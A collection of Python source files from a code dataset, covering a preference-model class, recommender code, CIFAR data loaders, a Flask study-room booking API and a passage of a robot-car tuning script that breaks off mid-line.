+{"seq_id":"44463210","text":"\"\"\"This module includes the specification of the model.\"\"\"\nimport numpy as np\n\nfrom trempy.shared.shared_auxiliary import dist_class_attributes\nfrom trempy.shared.shared_auxiliary import print_init_dict\nfrom trempy.config_trempy import PREFERENCE_PARAMETERS\nfrom trempy.paras.clsParas import ParasCls\nfrom trempy.shared.clsBase import BaseCls\nfrom trempy.read.read import read\n\n\nclass ModelCls(BaseCls):\n \"\"\"This class manages all issues about the model specification.\"\"\"\n def __init__(self, fname):\n\n init_dict = read(fname)\n\n # We first tackle the more complex issue of parameter management.\n paras_obj = ParasCls(init_dict)\n\n self.attr = dict()\n\n # Parameters\n self.attr['paras_obj'] = paras_obj\n\n # Information\n upper = []\n upper += [init_dict['UNIATTRIBUTE SELF']['max']]\n upper += [init_dict['UNIATTRIBUTE OTHER']['max']]\n self.attr['upper'] = upper\n\n # Marginal utility functions\n marginals = []\n marginals += [init_dict['UNIATTRIBUTE SELF']['marginal']]\n marginals += [init_dict['UNIATTRIBUTE OTHER']['marginal']]\n self.attr['marginals'] = marginals\n\n # Cutoffs\n self.attr['cutoffs'] = init_dict['CUTOFFS']\n\n # Simulation\n self.attr['sim_agents'] = init_dict['SIMULATION']['agents']\n self.attr['sim_seed'] = init_dict['SIMULATION']['seed']\n self.attr['sim_file'] = init_dict['SIMULATION']['file']\n\n # Estimation\n self.attr['est_detailed'] = init_dict['ESTIMATION']['detailed']\n self.attr['optimizer'] = init_dict['ESTIMATION']['optimizer']\n\n self.attr['est_agents'] = init_dict['ESTIMATION']['agents']\n self.attr['num_skip'] = init_dict['ESTIMATION']['skip']\n self.attr['est_file'] = init_dict['ESTIMATION']['file']\n self.attr['maxfun'] = init_dict['ESTIMATION']['maxfun']\n self.attr['start'] = init_dict['ESTIMATION']['start']\n\n # Optimizer options\n self.attr['opt_options'] = dict()\n\n self.attr['opt_options']['SCIPY-BFGS'] = dict()\n self.attr['opt_options']['SCIPY-BFGS']['gtol'] = init_dict['SCIPY-BFGS']['gtol']\n self.attr['opt_options']['SCIPY-BFGS']['eps'] = init_dict['SCIPY-BFGS']['eps']\n\n self.attr['opt_options']['SCIPY-POWELL'] = dict()\n self.attr['opt_options']['SCIPY-POWELL']['xtol'] = init_dict['SCIPY-POWELL']['xtol']\n self.attr['opt_options']['SCIPY-POWELL']['ftol'] = init_dict['SCIPY-POWELL']['ftol']\n\n para_objs = paras_obj.get_attr('para_objs')\n\n questions = []\n for para_obj in para_objs:\n label = para_obj.get_attr('label')\n if label in PREFERENCE_PARAMETERS:\n continue\n\n questions += [label]\n\n self.attr['questions'] = sorted(questions)\n self.attr['num_questions'] = len(questions)\n\n # We now need to check the integrity of the class instance.\n self._check_integrity()\n\n def update(self, perspective, which, values):\n \"\"\"This method updates the estimation parameters.\"\"\"\n # Distribute class attributes\n paras_obj = self.attr['paras_obj']\n\n paras_obj.set_values(perspective, which, values)\n\n def write_out(self, fname):\n \"\"\"This method creates a initialization dictionary of the current class instance.\"\"\"\n init_dict = dict()\n\n labels = []\n labels += ['UNIATTRIBUTE SELF', 'UNIATTRIBUTE OTHER', 'MULTIATTRIBUTE COPULA']\n labels += ['QUESTIONS', 'CUTOFFS', 'ESTIMATION', 'SIMULATION']\n for label in labels:\n init_dict[label] = dict()\n\n paras_obj = self.attr['paras_obj']\n questions = self.attr['questions']\n\n # Preferences\n init_dict['UNIATTRIBUTE SELF']['marginal'] = self.attr['marginals'][0]\n init_dict['UNIATTRIBUTE SELF']['r'] = paras_obj.get_para('r_self')\n init_dict['UNIATTRIBUTE SELF']['max'] = self.attr['upper'][0]\n\n init_dict['UNIATTRIBUTE OTHER']['marginal'] = self.attr['marginals'][1]\n init_dict['UNIATTRIBUTE OTHER']['r'] = paras_obj.get_para('r_other')\n init_dict['UNIATTRIBUTE OTHER']['max'] = self.attr['upper'][1]\n\n init_dict['MULTIATTRIBUTE COPULA']['delta'] = paras_obj.get_para('delta')\n init_dict['MULTIATTRIBUTE COPULA']['self'] = paras_obj.get_para('self')\n init_dict['MULTIATTRIBUTE COPULA']['other'] = paras_obj.get_para('other')\n\n # Questions\n for q in questions:\n init_dict['QUESTIONS'][q] = paras_obj.get_para(q)\n\n # Cutoffs\n init_dict['CUTOFFS'] = self.attr['cutoffs']\n\n # Estimation\n init_dict['ESTIMATION']['detailed'] = self.attr['est_detailed']\n init_dict['ESTIMATION']['optimizer'] = self.attr['optimizer']\n init_dict['ESTIMATION']['agents'] = self.attr['est_agents']\n init_dict['ESTIMATION']['skip'] = self.attr['num_skip']\n init_dict['ESTIMATION']['file'] = self.attr['est_file']\n init_dict['ESTIMATION']['maxfun'] = self.attr['maxfun']\n init_dict['ESTIMATION']['start'] = self.attr['start']\n\n # Simulation\n init_dict['SIMULATION']['agents'] = self.attr['sim_agents']\n init_dict['SIMULATION']['seed'] = self.attr['sim_seed']\n init_dict['SIMULATION']['file'] = self.attr['sim_file']\n\n # Optimizer options\n init_dict['SCIPY-BFGS'] = dict()\n init_dict['SCIPY-BFGS']['gtol'] = self.attr['opt_options']['SCIPY-BFGS']['gtol']\n init_dict['SCIPY-BFGS']['eps'] = self.attr['opt_options']['SCIPY-BFGS']['eps']\n\n init_dict['SCIPY-POWELL'] = dict()\n init_dict['SCIPY-POWELL']['xtol'] = self.attr['opt_options']['SCIPY-POWELL']['xtol']\n init_dict['SCIPY-POWELL']['ftol'] = self.attr['opt_options']['SCIPY-POWELL']['ftol']\n\n print_init_dict(init_dict, fname)\n\n def _check_integrity(self):\n \"\"\"This method checks the integrity of the class instance.\"\"\"\n # Distribute class attributes for further processing.\n args = []\n args += ['paras_obj', 'sim_seed', 'sim_agents', 'sim_file', 'est_agents', 'maxfun']\n args += ['est_file', 'questions', 'start', 'num_skip']\n\n paras_obj, sim_seed, sim_agents, sim_file, est_agents, maxfun, est_file, questions, \\\n start, num_skip = dist_class_attributes(self, *args)\n\n # We restrict the identifiers for the questions between 1 and 16\n np.testing.assert_equal(12 < min(questions) <= max(questions) < 46, True)\n\n # The number of skipped individuals has to be non-negative.\n np.testing.assert_equal(0 <= num_skip, True)\n\n # We have to alternative how to start the estimation.\n np.testing.assert_equal(start in ['init', 'auto'], True)\n","sub_path":"trempy/clsModel.py","file_name":"clsModel.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"379963352","text":"import recommend\r\nimport pageRankRecommender as PRR\r\nimport recommenderSurprise as RS\r\nimport app\r\nimport json\r\nimport collections\r\nfrom collections import Counter\r\nimport userInfo\r\n\r\nclass RecommendationCombination():\r\n def __init__(self, numEntities = 1000): \r\n self.userFavs = {}\r\n self.topStories = {}\r\n self.stories = []\r\n self.users = []\r\n self.reviews = [] \r\n with open('resultCleanup.jl') as f: \r\n cnt = 0\r\n for line in f:\r\n if cnt > numEntities:\r\n break\r\n cnt += 1\r\n j = json.loads(line)\r\n if j[\"pT\"] == \"user\":\r\n self.users.append(\r\n {\r\n 'name':j['name'], \r\n 'stories':j['stories'],\r\n 'favorites':j['favorites']\r\n })\r\n favAuthors = []\r\n favs = j[\"favorites\"]\r\n for elem in favs:\r\n favAuthors.append(elem[\"A\"])\r\n self.userFavs[j[\"name\"]] = set(favAuthors)\r\n\r\n if j[\"pT\"] == \"story\":\r\n favs = int(j[\"otherInfo\"][\"favorites\"])\r\n author = j[\"author\"]\r\n link = j[\"storyLink\"]\r\n \r\n self.stories.append({'storyLink':j[\"storyLink\"]})\r\n\r\n if author not in self.topStories:\r\n self.topStories[author] = (link, int(favs))\r\n else:\r\n #if the current top story for the author has less favorites than the new story then make the new story the top story. else don't change anything.\r\n if int(self.topStories[author][1]) < int(favs):\r\n self.topStories[author] = (link, int(favs)) \r\n if j[\"pT\"] == \"review\":\r\n item = {}\r\n item['rO'] = j['rO']\r\n item['r'] = j['r']\r\n item['sS'] = j['sS']\r\n self.reviews.append(item)\r\n\r\n self.prRecommender = PRR.pageRankRecommender(self.users, self.stories)\r\n self.sRecommender = RS.surpriseRecommender(self.stories, self.reviews, self.users)\r\n self.sRecommender.train()\r\n\r\n def getTopAuthors(self, link):\r\n\r\n favoriteAuthors = userInfo.getFavoriteAuthors(link)\r\n\r\n basicRecommendations = recommend.recommender(favoriteAuthors, self.userFavs, self.topStories)\r\n basicRecommendations = Counter({ x : y[0] for x, y in basicRecommendations.items()})\r\n pageRankRecommendations = Counter({link: score * .1 for link, score in self.prRecommender.predictBestAuthors().items()})\r\n\r\n combinedResults = dict(basicRecommendations + pageRankRecommendations)\r\n #print(len(basicRecommendations),len(pageRankRecommendations),len(combinedResults))\r\n combinedResults = [(link, score) for link, score in combinedResults.items()]\r\n combinedResults = sorted(combinedResults, key=lambda tup: tup[1], reverse=True)[:10]\r\n #print(combinedResults[:10])\r\n\r\n\r\n return [ x for x, y in combinedResults]\r\n\r\n def getTopStories(self, link):\r\n def scaleCounter(counter, scaler):\r\n return Counter({ link : score * scaler for link, score in counter.items()})\r\n\r\n pageRankRecommendations = Counter({link: score for link, score in self.prRecommender.predictBestStories().items()})\r\n pageRankRecommendations = scaleCounter(pageRankRecommendations, .1)\r\n surpriseRecommendations = Counter(self.sRecommender.predict(link, self.stories))\r\n surpriseRecommendations = scaleCounter(surpriseRecommendations, .9)\r\n\r\n combinedResults = pageRankRecommendations + surpriseRecommendations\r\n combinedResults = [(link, score) for link, score in combinedResults.items()]\r\n combinedResults = sorted(combinedResults, key=lambda tup: tup[1], reverse=True)[:10]\r\n print(combinedResults)\r\n return [ x for x, y in combinedResults]\r\n","sub_path":"RecommendationCombination.py","file_name":"RecommendationCombination.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"393710694","text":"from google.appengine.ext import db\n\n\n\nclass Feed(db.Model):\n owner = db.UserProperty(required=True)\n last_fetch = db.DateTimeProperty()\n url = db.StringProperty(required=True)\n title = db.StringProperty()\n is_valid = db.BooleanProperty(default=True)\n\n\nclass ReadyData(db.Model):\n DATA_TYPES = ('feed', 'page')\n\n content = db.TextProperty(default='')\n owner = db.UserProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n merged = db.IntegerProperty(default=1)\n data_type = db.StringProperty(choices=DATA_TYPES, required=True)\n\n def as_html_page(self):\n return '''\n \n \n \n \n Kindledump articles \n \n %s\n \n ''' % self.content\n","sub_path":"src/fetcher/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181380966","text":"from torch.utils.data import dataset\nfrom torchvision import transforms\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom PIL import Image\n\nsize = 32\ntrans = {\n 'train':\n transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop((size, size), padding=4),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010])\n ]),\n 'test':\n transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010])\n ])\n}\n\n\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\n\nclass CIFAR10(dataset.Dataset):\n def __init__(self, mode, root='./data/cifar-10-batches-py/'):\n assert mode in ['train', 'test'], print('mode must be \"train\" or \"test\"')\n data_root = root\n data_files = {'train': ['data_batch_%d' % x for x in range(1, 6)],\n 'test': ['test_batch']}\n self.imgs = None\n self.labels = []\n # self.class_names = self._unpickle(os.path.join(data_root, 'batches.meta'))[b'label_names]\n for f in data_files[mode]:\n data_dict = unpickle(os.path.join(data_root, f))\n data = data_dict[b'data'].reshape(-1, 3, 32, 32).transpose(0, 2, 3, 1)\n if self.imgs is None:\n self.imgs = data\n else:\n self.imgs = np.vstack((self.imgs, data))\n self.labels += data_dict[b'labels']\n\n self.trans = trans[mode]\n\n def __getitem__(self, index):\n img = Image.fromarray(self.imgs[index])\n label = self.labels[index]\n img = self.trans(img)\n\n return img, label\n\n def __len__(self):\n return len(self.labels)\n\n\nclass CIFAR100(dataset.Dataset):\n def __init__(self, mode, root='./data/cifar-100-py'):\n super().__init__()\n self.data_root = root\n\n data = unpickle(os.path.join(self.data_root, mode))\n print(data.keys())\n self.fnames = data[b'filenames']\n self.imgs = data[b'data'].reshape(-1, 3, 32, 32).transpose(0, 2, 3, 1)\n self.labels = data[b'fine_labels']\n self.corse = data[b'coarse_labels']\n self.trans = trans[mode]\n\n def __getitem__(self, index):\n img = Image.fromarray(self.imgs[index])\n label = self.labels[index]\n img = self.trans(img)\n\n return img, label\n\n def __len__(self):\n return len(self.labels)\n\n\ndef get_data(num_classes=10, root='./data/cifar-10-batches-py'):\n if num_classes == 10:\n Dataset = CIFAR10\n else:\n Dataset = CIFAR100\n\n trainset = Dataset(mode='train', root=root)\n testset = Dataset(mode='test', root=root)\n\n return trainset, testset\n\n\ndef imshow(inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = torchvision.utils.make_grid(inp)\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n plt.show()\n\n\nif __name__ == '__main__':\n data = CIFAR10(mode='train', root='./data/cifar-10-batches-py')\n loader = DataLoader(data, batch_size=16, shuffle=True, num_workers=0)\n imgs, label = iter(loader).__next__()\n imshow(imgs)\n print(label)\n","sub_path":"cifar_data.py","file_name":"cifar_data.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15730038","text":"from tkinter import *\n\n\ndef main():\n root = Tk()\n App(root)\n print(\"Main loop.\")\n root.mainloop()\n\nclass App:\n def __init__(self, master):\n self.master = master \n master.protocol(\"WM_DELETE_WINDOW\", self.handler) #Exit when x pressed, notice that its the name of the function 'self.handler' and not a method call self.handler()\n\n def handler(self):\n self.master.destroy()\n print(\"Destoy root window.\")\n self.master.quit()\n print(\"Quit main loop.\")\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tk_test2.py","file_name":"tk_test2.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513157010","text":"import os\nimport datetime\nimport requests\n\nfrom flask import jsonify, request\nfrom dateutil.parser import parse\n\nfrom server import app, db, sqldb\nfrom penn.base import APIError\nfrom .models import StudySpacesBooking, User\nfrom .penndata import studyspaces, wharton\nfrom .base import cached_route\n\n\ndef get_wharton_sessionid(public=False):\n \"\"\" Try to get a GSR session id. \"\"\"\n sessionid = request.args.get('sessionid')\n cache_key = 'studyspaces:gsr:sessionid'\n\n if sessionid:\n return sessionid\n\n if public:\n if db.exists(cache_key):\n return db.get(cache_key).decode('utf8')\n\n return os.environ.get('GSR_SESSIONID')\n\n return None\n\n\ndef save_wharton_sessionid():\n sessionid = request.args.get('sessionid')\n cache_key = 'studyspaces:gsr:sessionid'\n\n if sessionid:\n db.set(cache_key, sessionid, ex=604800)\n\n\n@app.route('/studyspaces/gsr', methods=['GET'])\ndef get_wharton_gsrs_temp_route():\n \"\"\" Temporary endpoint to allow non-authenticated users to access the list of GSRs. \"\"\"\n date = request.args.get('date')\n try:\n data = wharton.get_wharton_gsrs(get_wharton_sessionid(public=True), date)\n save_wharton_sessionid()\n return jsonify(data)\n except APIError as error:\n return jsonify({'error': str(error)}), 400\n\n\n@app.route('/studyspaces/gsr/reservations', methods=['GET'])\ndef get_wharton_gsr_reservations():\n \"\"\"\n Returns JSON containing a list of Wharton GSR reservations.\n \"\"\"\n\n sessionid = get_wharton_sessionid()\n\n if not sessionid:\n return jsonify({'error': 'No Session ID provided.'})\n\n try:\n reservations = wharton.get_reservations(sessionid)\n save_wharton_sessionid()\n return jsonify({'reservations': reservations})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\n@app.route('/studyspaces/gsr/delete', methods=['POST'])\ndef delete_wharton_gsr_reservation():\n \"\"\"\n Deletes a Wharton GSR reservation\n \"\"\"\n booking = request.form.get('booking')\n sessionid = request.form.get('sessionid')\n if not booking:\n return jsonify({\"error\": \"No booking sent to server.\"})\n if not sessionid:\n return jsonify({\"error\": \"No session id sent to server.\"})\n\n try:\n result = wharton.delete_booking(sessionid, booking)\n save_wharton_sessionid()\n return jsonify({'result': result})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\n@app.route('/studyspaces/availability/', methods=['GET'])\ndef parse_times(building):\n \"\"\"\n Returns JSON containing all rooms for a given building.\n\n Usage:\n /studyspaces/availability/ gives all rooms for the next 24 hours\n /studyspaces/availability/?start=2018-25-01 gives all rooms in the start date\n /studyspaces/availability/?start=...&end=... gives all rooms between the two days\n \"\"\"\n if 'date' in request.args:\n start = request.args.get('date')\n end = request.args.get('date')\n else:\n start = request.args.get('start')\n end = request.args.get('end')\n\n if building == 1:\n sessionid = get_wharton_sessionid(public=True)\n try:\n rooms = wharton.get_wharton_gsrs(sessionid, date=start)\n rooms = wharton.switch_format(rooms)\n save_wharton_sessionid()\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n else:\n try:\n rooms = studyspaces.get_rooms(building, start, end)\n rooms[\"location_id\"] = rooms[\"id\"]\n rooms[\"rooms\"] = []\n for room_list in rooms[\"categories\"]:\n for room in room_list[\"rooms\"]:\n room[\"thumbnail\"] = room[\"image\"]\n del room[\"image\"]\n room[\"room_id\"] = room[\"id\"]\n del room[\"id\"]\n room[\"gid\"] = room_list[\"cid\"]\n room[\"lid\"] = building\n room[\"times\"] = room[\"availability\"]\n del room[\"availability\"]\n for time in room[\"times\"]:\n time[\"available\"] = True\n time[\"start\"] = time[\"from\"]\n time[\"end\"] = time[\"to\"]\n del time[\"from\"]\n del time[\"to\"]\n rooms[\"rooms\"].append(room)\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n return jsonify(rooms)\n\n\n@app.route('/studyspaces/locations', methods=['GET'])\ndef display_id_pairs():\n \"\"\"\n Returns JSON containing a list of buildings with their ids.\n \"\"\"\n def get_data():\n return {\"locations\": studyspaces.get_buildings() + [{\"lid\": 1, \"name\": \"Huntsman Hall\", \"service\": \"wharton\"}]}\n\n return cached_route('studyspaces:locations', datetime.timedelta(days=1), get_data)\n\n\n@app.route('/studyspaces/cancel', methods=['POST'])\ndef cancel_room():\n \"\"\"\n Cancels a booked room.\n \"\"\"\n try:\n user = User.get_user()\n except ValueError as err:\n return jsonify({\"error\": str(err)})\n\n booking_id = request.form.get(\"booking_id\")\n if not booking_id:\n return jsonify({\"error\": \"No booking id sent to server!\"})\n if \",\" in booking_id:\n return jsonify({\"error\": \"Only one booking may be cancelled at a time.\"})\n\n booking = StudySpacesBooking.query.filter_by(booking_id=booking_id).first()\n if booking:\n if (booking.user is not None) and (booking.user != user.id):\n return jsonify({\"error\": \"Unauthorized: This reservation was booked by someone else.\"}), 400\n if booking.is_cancelled:\n return jsonify({\"error\": \"This reservation has already been cancelled.\"}), 400\n\n if booking_id.isdigit():\n sessionid = request.form.get(\"sessionid\")\n if not sessionid:\n return jsonify({\"error\": \"No session id sent to server.\"}), 400\n try:\n wharton.delete_booking(sessionid, booking_id)\n save_wharton_sessionid()\n if booking:\n booking.is_cancelled = True\n sqldb.session.commit()\n else:\n save_booking(\n lid=1,\n email=user.email,\n booking_id=booking_id,\n is_cancelled=True,\n user=user.id\n )\n return jsonify({'result': [{\"booking_id\": booking_id, \"cancelled\": True}]})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n else:\n resp = studyspaces.cancel_room(booking_id)\n if \"error\" not in resp:\n if booking:\n booking.is_cancelled = True\n sqldb.session.commit()\n else:\n save_booking(\n email=user.email,\n booking_id=booking_id,\n is_cancelled=True,\n user=user.id\n )\n return jsonify({'result': resp})\n\n\n@app.route('/studyspaces/book', methods=['POST'])\ndef book_room():\n \"\"\"\n Books a room.\n \"\"\"\n try:\n room = int(request.form[\"room\"])\n except (KeyError, ValueError):\n return jsonify({\"results\": False, \"error\": \"Please specify a correct room id!\"}), 400\n\n try:\n start = parse(request.form[\"start\"])\n end = parse(request.form[\"end\"])\n except KeyError:\n return jsonify({\"results\": False, \"error\": \"No start and end parameters passed to server!\"}), 400\n\n try:\n lid = int(request.form[\"lid\"])\n except (KeyError, ValueError):\n lid = None\n\n email = None\n\n if lid == 1:\n sessionid = request.form.get(\"sessionid\")\n if not sessionid:\n return jsonify({\"results\": False, \"error\": \"You must pass a sessionid when booking a Wharton GSR!\"}), 400\n resp = wharton.book_reservation(sessionid, room, start, end)\n resp[\"results\"] = resp[\"success\"]\n room_booked = resp[\"success\"]\n del resp[\"success\"]\n if room_booked:\n save_wharton_sessionid()\n booking_id = None\n\n # Look up the reservation to get the booking id\n reservations = get_reservations(None, sessionid, 0)\n startStr = request.form[\"start\"].split(\"-\")[0]\n endStr = request.form[\"end\"].split(\"-\")[0]\n for reservation in reservations:\n resStartStr = reservation[\"fromDate\"].split(\"-\")[0]\n resEndStr = reservation[\"toDate\"].split(\"-\")[0]\n if startStr == resStartStr and endStr == resEndStr:\n booking_id = reservation[\"booking_id\"]\n break\n else:\n contact = {}\n for arg, field in [(\"fname\", \"firstname\"), (\"lname\", \"lastname\"), (\"email\", \"email\"), (\"nickname\", \"groupname\")]:\n try:\n contact[arg] = request.form[field]\n except KeyError:\n return jsonify({\"results\": False, \"error\": \"'{}' is a required parameter!\".format(field)})\n\n email = contact.get(\"email\")\n contact[\"custom\"] = {}\n contact[\"custom\"][\"q3699\"] = get_affiliation(email)\n for arg, field in [(\"q2533\", \"phone\"), (\"q2555\", \"size\"), (\"q2537\", \"size\"), (\"q3699\", \"affiliation\")]:\n try:\n contact[\"custom\"][arg] = request.form[field]\n except KeyError:\n pass\n\n resp = studyspaces.book_room(room, start.isoformat(), end.isoformat(), **contact)\n room_booked = resp.get(\"results\")\n booking_id = resp.get(\"booking_id\")\n\n try:\n user = User.get_user()\n user_id = user.id\n if email and user.email != email:\n user.email = email\n sqldb.session.commit()\n else:\n email = user.email\n except ValueError:\n user_id = None\n\n if room_booked:\n save_booking(\n lid=lid,\n rid=room,\n email=email,\n start=start.replace(tzinfo=None),\n end=end.replace(tzinfo=None),\n booking_id=booking_id,\n user=user_id\n )\n return jsonify(resp)\n\n\ndef get_affiliation(email):\n if \"wharton\" in email:\n return \"Wharton\"\n elif \"seas\" in email:\n return \"SEAS\"\n elif \"sas\" in email:\n return \"SAS\"\n else:\n return \"Other\"\n\n\n@app.route('/studyspaces/reservations', methods=['GET'])\ndef get_reservations_endpoint():\n \"\"\"\n Gets a users reservations.\n \"\"\"\n\n email = request.args.get('email')\n sessionid = request.args.get('sessionid')\n if not email and not sessionid:\n return jsonify({\"error\": \"A session id or email must be sent to server.\"}), 400\n\n libcal_search_span = request.args.get(\"libcal_search_span\")\n if libcal_search_span:\n try:\n libcal_search_span = int(libcal_search_span)\n except ValueError:\n return jsonify({\"error\": \"Search span must be an integer.\"}), 400\n else:\n libcal_search_span = 3\n\n try:\n reservations = get_reservations(email, sessionid, libcal_search_span)\n return jsonify({'reservations': reservations})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\ndef get_reservations(email, sessionid, libcal_search_span, timeout=20):\n reservations = []\n if sessionid:\n try:\n gsr_reservations = wharton.get_reservations(sessionid, timeout)\n timezone = wharton.get_dst_gmt_timezone()\n\n for res in gsr_reservations:\n res[\"service\"] = \"wharton\"\n res[\"booking_id\"] = str(res[\"booking_id\"])\n res[\"name\"] = res[\"location\"]\n res[\"gid\"] = 1\n res[\"lid\"] = 1\n res[\"info\"] = None\n del res[\"location\"]\n\n date = datetime.datetime.strptime(res[\"date\"], \"%b %d, %Y\")\n date_str = datetime.datetime.strftime(date, \"%Y-%m-%d\")\n\n if res[\"startTime\"] == \"midnight\":\n res[\"fromDate\"] = date_str + \"T00:00:00-{}\".format(timezone)\n elif res[\"startTime\"] == \"noon\":\n res[\"fromDate\"] = date_str + \"T12:00:00-{}\".format(timezone)\n else:\n start_str = res[\"startTime\"].replace(\".\", \"\").upper()\n try:\n start_time = datetime.datetime.strptime(start_str, \"%I:%M %p\")\n except ValueError:\n start_time = datetime.datetime.strptime(start_str, \"%I %p\")\n start_str = datetime.datetime.strftime(start_time, \"%H:%M:%S\")\n res[\"fromDate\"] = \"{}T{}-{}\".format(date_str, start_str, timezone)\n\n if res[\"endTime\"] == \"midnight\":\n date += datetime.timedelta(days=1)\n date_str = datetime.datetime.strftime(date, \"%Y-%m-%d\")\n res[\"toDate\"] = date_str + \"T00:00:00-{}\".format(timezone)\n elif res[\"endTime\"] == \"noon\":\n res[\"toDate\"] = date_str + \"T12:00:00-{}\".format(timezone)\n else:\n end_str = res[\"endTime\"].replace(\".\", \"\").upper()\n try:\n end_time = datetime.datetime.strptime(end_str, \"%I:%M %p\")\n except ValueError:\n end_time = datetime.datetime.strptime(end_str, \"%I %p\")\n end_str = datetime.datetime.strftime(end_time, \"%H:%M:%S\")\n res[\"toDate\"] = \"{}T{}-{}\".format(date_str, end_str, timezone)\n\n del res[\"date\"]\n del res[\"startTime\"]\n del res[\"endTime\"]\n\n reservations.extend(gsr_reservations)\n\n except APIError:\n pass\n\n if email:\n confirmed_reservations = []\n try:\n def is_not_cancelled_in_db(booking_id):\n booking = StudySpacesBooking.query.filter_by(booking_id=booking_id).first()\n return not (booking and booking.is_cancelled)\n\n now = datetime.datetime.now()\n dateFormat = \"%Y-%m-%d\"\n i = 0\n while len(confirmed_reservations) == 0 and i < libcal_search_span:\n date = now + datetime.timedelta(days=i)\n dateStr = datetime.datetime.strftime(date, dateFormat)\n libcal_reservations = studyspaces.get_reservations(email, dateStr, timeout)\n confirmed_reservations = [res for res in libcal_reservations if (type(res) == dict and res[\"status\"] == \"Confirmed\"\n and datetime.datetime.strptime(res[\"toDate\"][:-6], \"%Y-%m-%dT%H:%M:%S\") >= now)]\n confirmed_reservations = [res for res in confirmed_reservations if is_not_cancelled_in_db(res[\"bookId\"])]\n i += 1\n\n except APIError:\n pass\n\n # Fetch reservations in database that are not being returned by API\n db_bookings = StudySpacesBooking.query.filter_by(email=email)\n db_booking_ids = [str(x.booking_id) for x in db_bookings if x.end\n and x.end > now\n and not str(x.booking_id).isdigit()\n and not x.is_cancelled]\n reservation_ids = [x[\"bookId\"] for x in confirmed_reservations]\n missing_booking_ids = list(set(db_booking_ids) - set(reservation_ids))\n if missing_booking_ids:\n missing_bookings_str = \",\".join(missing_booking_ids)\n missing_reservations = studyspaces.get_reservations_for_booking_ids(missing_bookings_str)\n confirmed_missing_reservations = [res for res in missing_reservations if res[\"status\"] == \"Confirmed\"]\n confirmed_reservations.extend(confirmed_missing_reservations)\n\n for res in confirmed_reservations:\n res[\"service\"] = \"libcal\"\n res[\"booking_id\"] = res[\"bookId\"]\n res[\"room_id\"] = res[\"eid\"]\n res[\"gid\"] = res[\"cid\"]\n del res[\"bookId\"]\n del res[\"eid\"]\n del res[\"cid\"]\n del res[\"status\"]\n del res[\"email\"]\n del res[\"firstName\"]\n del res[\"lastName\"]\n\n room_ids = \",\".join(list(set([str(x[\"room_id\"]) for x in confirmed_reservations])))\n if room_ids:\n rooms = studyspaces.get_room_info(room_ids)\n for room in rooms:\n room[\"thumbnail\"] = room[\"image\"]\n del room[\"image\"]\n del room[\"formid\"]\n\n for res in confirmed_reservations:\n room = [x for x in rooms if x[\"id\"] == res[\"room_id\"]][0]\n res[\"name\"] = room[\"name\"]\n res[\"info\"] = room\n del res[\"room_id\"]\n reservations.extend(confirmed_reservations)\n\n return reservations\n\n\ndef save_booking(**info):\n item = StudySpacesBooking(**info)\n\n sqldb.session.add(item)\n sqldb.session.commit()\n","sub_path":"server/studyspaces.py","file_name":"studyspaces.py","file_ext":"py","file_size_in_byte":17047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"225569048","text":"import picar_4wd as fc\nimport part2\nimport time\nimport math\n\nFINE_TUNE_STEP_SIZE = 7.5\nTHRESHOLD = 100 #centimeter\nFINE_TUNE_PWR = part2.TURN_PWR\nFINE_TUNE_TIME = part2.TURN_TIME * (FINE_TUNE_STEP_SIZE/45) #make it turn FINE_TUNE_STEP_SIZE degree each time\n\nclass fineTune():\n def __init__(self, del_dir):\n self.ref_points = []\n self.curr_points = []\n self.del_dir = del_dir\n self.tune_range_degree = abs(del_dir) * 15 # turn 45 degree -> fine tune 15 degree; turn 90 degree -> fine tune 30 degree\n self.tune_range = round(self.tune_range_degree / FINE_TUNE_STEP_SIZE)\n\n def set_ref_points(self):\n ref_angle_dist = part2.get_distances( round(180/FINE_TUNE_STEP_SIZE), get_median = False)\n #ref_angle_dist = [(90, 200), (75,200), (60, 100), (45,110), (30,90), (15, 300), (0, 400), (-15, 400), (-30, 20), (-45, 10), (-60, 100), (-75, 400), (-90, 400)] ############ test #############\n self.ref_points = self._LT_threshold(ref_angle_dist)\n\n def fine_tune(self):\n # each elements in list represents FINE_TUNE_STEP_SIZE degree\n # fine tune +- self.tune_range_degree degree\n is_turn_left = (self.del_dir >= 0)\n curr_angle_dist = part2.get_distances( round(180/FINE_TUNE_STEP_SIZE), get_median = False)\n #curr_angle_dist = [(90, 90), (75,300), (60, 400), (45,400), (30,20), (15, 10), (0, 100), (-15, 400), (-30, 